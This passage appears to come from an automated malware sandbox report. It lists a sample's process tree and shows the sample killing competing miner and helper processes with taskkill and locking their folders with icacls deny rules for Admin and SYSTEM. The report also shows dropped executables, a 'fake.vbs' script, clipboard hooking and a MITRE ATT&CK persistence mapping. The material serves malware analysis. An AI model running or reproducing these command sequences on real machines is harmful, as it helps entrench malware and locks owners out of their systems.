C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\local\xpon\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM winhost.exe /T /F7⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM attrib.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM helper.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM xmrig.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\isminer\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\isminer\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM security.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM comdev.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\comdev\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\comdev\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM wmipr.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\wmipr\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\wmipr\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM vshub.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM vsnhub.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM erenhub.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM AudioHD.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM AudioDriver.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM penapen.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM lum.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM syslog.exe /T /F7⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\syslog\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\syslog\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM wutphost.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\wutphost\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\wutphost\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM winlg.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\GoogleSoftware\\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\GoogleSoftware\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM pythonw.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM UsersControl.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM WindowHelperStorageHostSystemThread118466.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM WindowHelperStorageHostSystemThread100040.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM WindowHelperStorageHostSystemThread106333.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 1 /nobreak7⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM wup.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\local\temp\wup\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\local\temp\wup\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM bot.exe /T /F7⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM intel.exe /T /F7⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\DriversI\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\DriversI\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM minergate-cli.exe /T /F7⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM msvc.exe /T /F7⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\Svcms\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\Svcms\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM FileSystemDriver.exe /T /F7⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\FileSystemDriver\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\FileSystemDriver\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM geckof.exe /T /F7⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\geckof\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\geckof\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM initwin.exe /T /F7⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\initwin\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\initwin\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM packagest.exe /F7⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\packagest\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\packagest\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM ursb.exe /F7⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM hssvc.exe /T /F7⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM xmrig.exe /T /F7⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM CPU.exe /T /F7⤵
- Kills process with taskkill
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Programdata\microsoft\intel\L.bat" "5⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵
-
-
C:\Windows\SysWOW64\chcp.comchcp 8666⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 12 /nobreak6⤵
- Delays execution with timeout.exe
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Programdata\microsoft\intel\fake.vbs"5⤵
-
-
-
-
-
C:\programdata\microsoft\intel\TStart.exe"C:\programdata\microsoft\intel\TStart.exe"2⤵
- Executes dropped EXE
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1664636167848899562543390989-2073446692-1099718487-13253177671804770847-225461025"1⤵
- Executes dropped EXE
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1945976536-22649861317238444887473961731570812666-2249076656545273411202896120"1⤵
-
C:\Folder58\svnhost.exeC:\Folder58\svnhost.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Folder58\svcservice.exeC:\Folder58\svcservice.exe2⤵
- Executes dropped EXE
-
C:\Folder58\svcservice.exeC:\Folder58\svcservice.exe /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
-
-
C:\Folder58\svcservice.exeC:\Folder58\svcservice.exe /tray2⤵
- Executes dropped EXE
-
Network
MITRE ATT&CK Enterprise v6
Persistence
Account Manipulation
1Hidden Files and Directories
2Modify Existing Service
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
1.7MB
-
Filesize
1.3MB
-
Filesize
1.3MB